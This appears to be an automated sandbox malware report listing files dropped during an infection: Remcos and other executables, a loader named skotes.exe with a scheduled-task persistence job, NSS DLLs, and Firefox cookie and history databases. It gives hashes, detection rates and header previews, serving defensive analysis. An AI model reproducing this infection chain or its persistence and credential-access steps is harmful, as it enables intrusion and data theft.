SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2765824
Entropy (8bit):	6.470812789745328
Encrypted:	false
SSDEEP:	49152:R1KBA9WyT+vRYnUbUS2QNkTX9HPhvWTt:RY29WnZY3ZwkTz+T
MD5:	941E61557EF13F76A606C961A64ED6AB
SHA1:	4E95EC0B08C384F4C9752B21DF3A50C1A049D00A
SHA-256:	A9F670416324BE30FB1EBF3ACEB1D7874624461FD3CD7FB094BF8EC917A9720F
SHA-512:	7F804F2DCBB3F8AE209BDDDEA61259A5C94648661C29F44A6425CD89FCD4AB93F2550A0F05558DFA6071CFD2EBF9831B42E19D967A76F12FBDDA62DF68D323C3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. .............................RJ...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...mnhiavry..).......)..:..............@...gxujdorj. ........................@....taggant.@......"....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\remcos_a[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1948672
Entropy (8bit):	7.9458625437066575
Encrypted:	false
SSDEEP:	49152:nagZNlJJziNRWZVTyrNR6yUd/dSlilQBsq5jL:nawNlvWNRlrHSGRBsqR
MD5:	B85C47881BA0EB0B556B83827F8E75C8
SHA1:	DCCDF0DAEE468F9E9BED3EDF928F0839D26B47CB
SHA-256:	9D577624ACCA69F5B4097A6882E934B026A344757CF5CF31F3341E643ED2BA20
SHA-512:	CA158AFF36E4EEFF5D1C263A79972DFA0AA7584132F12A3D301A5CC5C47B57309FE71B4837C7B8CAA5022CB18529B565D6A0849ACDABD1AF939B76B48284A605
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H......H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H..........PE..L...k.$g.................`...$........K......p....@...........................K......_......................................d...x....`...M...................dK.............................pdK..................................................... . .P..........................@....rsrc....M...`......................@....idata ............................@... .0.........................@...zncloxxx......1.....................@...sftjullu......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\buildd[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	158208
Entropy (8bit):	5.507680890929418
Encrypted:	false
SSDEEP:	3072:d0Elo8nshOJIlE+/sY3I9bf4gDJVYRhYKdDrQOu:dPlo8sh8+EY3I9bfdDbcyO
MD5:	C426F46F2C074EDA8C903F9868BE046D
SHA1:	D0352482370BEFF107EB2B2F13E2DE275FBC91C7
SHA-256:	7CBA781D569196E89A86F10CEE7D69918FE05DF1461D1F0ED3426CCB2046002E
SHA-512:	97EED1BAD31BD2E558D2CF6FF3C3026D828F561E2D1439F0DACA420F53A3C6B1D59442F043357BE9A33761A8E99AC935D08239D2E50811D47909CEC8CAAD7C05
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0..^..........^\|... ........@.. ....................................`..................................\|..O.......H............................................................................ ............... ..H............text...d\... ...^.................. ..`.rsrc...H............`..............@..@.reloc...............h..............@..B................@\|......H.......<.........._...................................................PK..........................................5...P...n...w...{...................................................................\|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..".(,....n......~'........~'........Jr1..p..(^........*r.(,.......}J.......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.375347761364052
Encrypted:	false
SSDEEP:	48:SfNaoQxjTEQffNaoQ7u/Q7qfNaoQ9QFfNaoQL0UrU0U8QD:6NnQ5TEQ3NnQ7u/Q7yNnQ9QxNnQL0UrU
MD5:	F74D2300589F7FD9E3249031171A9E39
SHA1:	5F8F2CD343506413BC5171D35EAAC90C48998349
SHA-256:	D8572B171A7A4032420E99B8B51EBCE2F7EA067CB2BF4272739324A72CF4B704
SHA-512:	46EBE06F78DD1BC68E033412467C7FADDE86B9DCCF6EBB5B16F4B7B08A0F15128AC9D00E842A4EDC6342779A3C6BA0B49A72925A0C9B8AE6B6F782D563E6EEA6
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/E6C230B68FCAFFC57EA48347EA2C5051",.. "id": "E6C230B68FCAFFC57EA48347EA2C5051",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/E6C230B68FCAFFC57EA48347EA2C5051"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/28328A00E5D4F76E558639B20F7678D5",.. "id": "28328A00E5D4F76E558639B20F7678D5",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/28328A00E5D4F76E558639B20F7678D5"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2163712
Entropy (8bit):	7.958551329601189
Encrypted:	false
SSDEEP:	49152:cAt7qwi74aJO4rEuKzGkSolWdSXJi5J51+w:pGz7jGGeE0X2JrV
MD5:	D21A2EB1558C04AF68AA39932C381A77
SHA1:	8A1C7F2C06FCF55CCDFB8155A2AA2EC94CB8C5BB
SHA-256:	BA62E9E2F8ACE5672FBC814DB0B5FBD5A2D0A5D2D8EF55FD359E91AC756B4BBC
SHA-512:	BFFA84774F7857C827702C1F21619F55E4FE7B8FAB650B1E8598AB5D5C327B9DDF80724A3BE0ACB605C5E177B330830276C59E999754FC28809F1781FEBA2FC7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,.......s...........@...........................s.....f.!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... .p*.........................@...rswsxqeb.`....Y..R..................@...ekqrsvgt.....ps....... .............@....taggant.0....s..".... .............@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1948672
Entropy (8bit):	7.9458625437066575
Encrypted:	false
SSDEEP:	49152:nagZNlJJziNRWZVTyrNR6yUd/dSlilQBsq5jL:nawNlvWNRlrHSGRBsqR
MD5:	B85C47881BA0EB0B556B83827F8E75C8
SHA1:	DCCDF0DAEE468F9E9BED3EDF928F0839D26B47CB
SHA-256:	9D577624ACCA69F5B4097A6882E934B026A344757CF5CF31F3341E643ED2BA20
SHA-512:	CA158AFF36E4EEFF5D1C263A79972DFA0AA7584132F12A3D301A5CC5C47B57309FE71B4837C7B8CAA5022CB18529B565D6A0849ACDABD1AF939B76B48284A605
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H......H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H..........PE..L...k.$g.................`...$........K......p....@...........................K......_......................................d...x....`...M...................dK.............................pdK..................................................... . .P..........................@....rsrc....M...`......................@....idata ............................@... .0.........................@...zncloxxx......1.....................@...sftjullu......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	158208
Entropy (8bit):	5.507680890929418
Encrypted:	false
SSDEEP:	3072:d0Elo8nshOJIlE+/sY3I9bf4gDJVYRhYKdDrQOu:dPlo8sh8+EY3I9bfdDbcyO
MD5:	C426F46F2C074EDA8C903F9868BE046D
SHA1:	D0352482370BEFF107EB2B2F13E2DE275FBC91C7
SHA-256:	7CBA781D569196E89A86F10CEE7D69918FE05DF1461D1F0ED3426CCB2046002E
SHA-512:	97EED1BAD31BD2E558D2CF6FF3C3026D828F561E2D1439F0DACA420F53A3C6B1D59442F043357BE9A33761A8E99AC935D08239D2E50811D47909CEC8CAAD7C05
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0..^..........^\|... ........@.. ....................................`..................................\|..O.......H............................................................................ ............... ..H............text...d\... ...^.................. ..`.rsrc...H............`..............@..@.reloc...............h..............@..B................@\|......H.......<.........._...................................................PK..........................................5...P...n...w...{...................................................................\|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..".(,....n......~'........~'........Jr1..p..(^........*r.(,.......}J.......

C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3155968
Entropy (8bit):	6.674619156597174
Encrypted:	false
SSDEEP:	49152:NPZS2Fpw/O09/np3pGHBMIzc69fcinXsU:NPZS2FpI/2HBBc2cinX9
MD5:	A17F03DADDF4FFD5B038F13CA94CCA7D
SHA1:	BA20321C4F47082502DADDDEC7A70769C21E253A
SHA-256:	4149DDED7FD91B0ECA160FFF8D1E48D81BD206EF719BD54D1D5F86BC023EB4F9
SHA-512:	7A4D981C68E5BE25078A18AE2844C1842C491F93137B7B3037A3AE2AF9DD1074CE37F33BCF79C7BB9E47EB83A3CEB595918171F09039C2D1D398E7D892479A54
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........00...........@..........................`0......90...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...xdlmaljh.p......l.................@...lyfosorw..... 0.......0.............@....taggant.0...00.."....0.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2163712
Entropy (8bit):	7.958551329601189
Encrypted:	false
SSDEEP:	49152:cAt7qwi74aJO4rEuKzGkSolWdSXJi5J51+w:pGz7jGGeE0X2JrV
MD5:	D21A2EB1558C04AF68AA39932C381A77
SHA1:	8A1C7F2C06FCF55CCDFB8155A2AA2EC94CB8C5BB
SHA-256:	BA62E9E2F8ACE5672FBC814DB0B5FBD5A2D0A5D2D8EF55FD359E91AC756B4BBC
SHA-512:	BFFA84774F7857C827702C1F21619F55E4FE7B8FAB650B1E8598AB5D5C327B9DDF80724A3BE0ACB605C5E177B330830276C59E999754FC28809F1781FEBA2FC7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,.......s...........@...........................s.....f.!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... .p*.........................@...rswsxqeb.`....Y..R..................@...ekqrsvgt.....ps....... .............@....taggant.0....s..".... .............@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2765824
Entropy (8bit):	6.470812789745328
Encrypted:	false
SSDEEP:	49152:R1KBA9WyT+vRYnUbUS2QNkTX9HPhvWTt:RY29WnZY3ZwkTz+T
MD5:	941E61557EF13F76A606C961A64ED6AB
SHA1:	4E95EC0B08C384F4C9752B21DF3A50C1A049D00A
SHA-256:	A9F670416324BE30FB1EBF3ACEB1D7874624461FD3CD7FB094BF8EC917A9720F
SHA-512:	7F804F2DCBB3F8AE209BDDDEA61259A5C94648661C29F44A6425CD89FCD4AB93F2550A0F05558DFA6071CFD2EBF9831B42E19D967A76F12FBDDA62DF68D323C3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. .............................RJ...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...mnhiavry..).......)..:..............@...gxujdorj. ........................@....taggant.@......"....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsFHIEBKKFHI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3228160
Entropy (8bit):	6.680214659378165
Encrypted:	false
SSDEEP:	49152:83yYgV4g4c1Qcl0RVQ0lT7GrwaUQaE7sbajATPPSGfX/nF9uG:8o4qwVQ0lTKGQaEgbDTPtX/Fn
MD5:	D1C392CD0570CDFD8CC42A3D5DFCB0FF
SHA1:	C993560A4ED0EEAA57FCD97B3F8E411803460CC7
SHA-256:	1BAA1CBCE4187A8E9F1D71ED8FF9B400690CD11911817CCEBC77EDAD64ACAD63
SHA-512:	2A9AB0DDD79039C072E4B6655E18D5B96E18B7E4CC098C68877F010D8F12D4793C391F0F044B434F29D8C291A5593E8125A1B65AF01D39761CEE2C1F3134F8FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1......I1...@.................................W...k............................71.............................T71..................................................... . ............................@....rsrc...............................@....idata ............................@...lyrqextr..........................@...gmycikna.....@1.......1.............@....taggant.0...P1.."... 1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\o08k2d5ob5\report.lock

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsFHIEBKKFHI.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3228160
Entropy (8bit):	6.680214659378165
Encrypted:	false
SSDEEP:	49152:83yYgV4g4c1Qcl0RVQ0lT7GrwaUQaE7sbajATPPSGfX/nF9uG:8o4qwVQ0lTKGQaEgbDTPtX/Fn
MD5:	D1C392CD0570CDFD8CC42A3D5DFCB0FF
SHA1:	C993560A4ED0EEAA57FCD97B3F8E411803460CC7
SHA-256:	1BAA1CBCE4187A8E9F1D71ED8FF9B400690CD11911817CCEBC77EDAD64ACAD63
SHA-512:	2A9AB0DDD79039C072E4B6655E18D5B96E18B7E4CC098C68877F010D8F12D4793C391F0F044B434F29D8C291A5593E8125A1B65AF01D39761CEE2C1F3134F8FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1......I1...@.................................W...k............................71.............................T71..................................................... . ............................@....rsrc...............................@....idata ............................@...lyrqextr..........................@...gmycikna.....@1.......1.............@....taggant.0...P1.."... 1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsFHIEBKKFHI.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.418001342578277
Encrypted:	false
SSDEEP:	6:5XflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBjllllEt0:Ff2RKQ1CGAFAjzvYRQVBj0t0
MD5:	A54B458057F97999FBF351C7BE95B77D
SHA1:	E59852C24DFD3E263FC867E721BAF86614D71EB9
SHA-256:	9B7DCCE2875F40077C006E246DFABC42A8F2CD21426CABA50E95D9F6FE292357
SHA-512:	2F8032CD279F1376235A76AE4A4F2BB25B8FDEA27F1B3AD32B88EFE18A4F421EFFAD909BEAC05761C4EF41CB3ACF7FB46A77901C09F60EA0F14592C75BF8C7C9
Malicious:	false
Preview:	........=..L....r.v.F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3650)
Category:	downloaded
Size (bytes):	3655
Entropy (8bit):	5.8398342181291625
Encrypted:	false
SSDEEP:	96:i7KligIN6666VEKPkcYkdTaCo9ZgJ/dgDChf9KxjS/We9IfffffX:6YQN6666VJPkj0Tgjgbae9KxG/We9q
MD5:	8789DC3498B15C196688858796084D6F
SHA1:	57CAB65F30F6AF6740AEF9D86F65D6D962666CC0
SHA-256:	D9841C6FB4EB2E7C6F34490C5358BAC203F67F006D73234511A8B8D196BEB854
SHA-512:	1841B750BE35BC45BFAA26E10555F0F675C837BADBB0FF548B5A722CBDA5F8AD828D50393DABB51CD23E7D9ACC3104F246E9C25B52806537799C720B44C9345F
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["shiba inu crypto price prediction","netflix the diplomat season 2","deals black friday","sauber f1 drivers 2025","mega millions winning numbers","fortnite og fortnite","aston villa tyrone mings","stranger things season 5 netflix"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgovbS8wcjhnYnFkEiZUeXJvbmUgTWluZ3Mg4oCUIEVuZ2xpc2ggc29jY2VyIHBsYXllcjKnD2RhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWNBQUFDQWdNQkFRQUFBQUFBQUFBQUFBQUZCZ0lEQVFRSENBRC94QUEyRUFBQ0FRSUVBd1VHQXdrQU

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
